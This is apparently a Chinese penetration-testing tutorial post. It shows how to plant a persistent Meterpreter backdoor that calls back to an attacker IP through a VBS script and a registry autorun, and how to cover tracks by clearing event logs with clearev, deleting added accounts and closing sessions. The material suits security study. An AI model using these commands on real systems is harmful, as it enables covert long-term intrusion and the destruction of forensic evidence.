当前位置:网站首页>【kali-权限提升】(4.2.7)社会工程学工具包:权限维持创建后门、清除痕迹
【kali-权限提升】(4.2.7)社会工程学工具包:权限维持创建后门、清除痕迹
2022-08-09 18:44:00 【黑色地带(崛起)】
目录
一、权限维持创建后门
1.1、概述:
获取目标系统的访问权限后,如果目标用户破坏了该连接(重启),所以需要在此之前,创建一个后门来恢复与目标主机的连接,而无需再进入目标系统。,此时使用后门将允许自动重新与目标系统建立连接。
1.2、过程:
激活Meterpreter会话
sessions -i 2
查看帮助命令
run persistence -h
结合不同的选项,创建一个持久后门
run persistence -U -A -i 10 - 8090 -r 192.168.190.149
输出的信息显示创建后门过程,在目标系统中创建了一个持久脚本(保存在C:\DOCUME~l\Test\LOCALS~I\Temp\lzXBdJvcpnD.vbs)并篡改注册表,该脚本会自动在目标主机上运行, 并将会建立第二个Meterpreter会话。
验证后门
关闭攻击会话,并重启目标机
监听目标,重启后能上线获得攻击会话
注
就算远控木马文件payload.exe被清除,但后门还在
如果后门脚本、注册表注册项清除,将无法再控制
二、清除痕迹
(如果提示:stdapi_sys_eventlog_clear:操作失败:访问被拒绝)
(操作前都是需要提权的,如getsystem提取,或者查看补丁信息后提权)
2.1、第一步:日志
为了不暴露攻击者的痕迹行为,需要清除系统事件
打开 Windows 事件查看器(可以看到日志信息)
直接在控制面板搜
2.2、第二步:清理额外信息
删除添加的账号
net user 添加的用户名 /del
退出目标服务器的shell
exit 或者 logoff
删除日志
clearev
2.3、第三步:MSF清理
退出meterpreter shell
exit
查看所有的MSF连接
sessions
关闭所有的MSF链接(或指定的)
sessions -K
边栏推荐
猜你喜欢
Detailed explanation of VIT transformer
源码编译安装与yum和rpm软件安装详解
渗透测试——CFS三层靶机内网渗透实操
MQTT X Web:在线的 MQTT 5.0 客户端工具
双屏协作更高效,华硕灵耀X 双屏Pro 2022创作体验再升级
漏洞复现-redis未授权getshell
Fully automated machine learning modeling!The effect hangs the primary alchemist!
2022深圳(软考中级)系统集成项目管理工程师报名
毕昇编译器优化:Lazy Code Motion
国产抗新冠口服药每瓶不超300元/ 我国IPv6网络全面建成/ 谷歌入局折叠屏手机...今日更多新鲜事在此...
随机推荐
2022.08.06_每日一题
视频是主动学习吗?
competed中访问ref为undefined
重磅!上海985教授当选!全球仅4人!
为什么数字钱包需要引入小程序生态
重庆智博会|2022智博会到底有哪些看点?拭目以待
【Unity3D】2D动画
EsgynDB Troubleshooting - ERROR[2012] Server process tdm_arkesp could not becreated
Tims中国上市进入倒计时:年亏3.8亿 估值降至14亿美元
韩国严厉监管元宇宙相关企业
基于Web的疫情隔离区订餐系统
AWS CodePipeLine deploys ECS across accounts
AWS CodePipeLine 跨账号部署ECS
鹅厂机器狗花式穿越10m梅花桩:前空翻、单桩跳、起身作揖...全程不打一个趔趄...
[Free column] Xposed plug-in development for Android security [from scratch] tutorial
[免费专栏] Android安全之静态方式逆向APK应用浅析【手动注入smali+】+【IDA Pro静态分析so文件】+【IDA Pro基础使用讲解】
2022.08.05_每日一题
国产抗新冠口服药每瓶不超300元/ 我国IPv6网络全面建成/ 谷歌入局折叠屏手机...今日更多新鲜事在此...
NetCore路由的Endpoint模式
2021 RoboCom 世界机器人开发者大赛-本科组(决赛)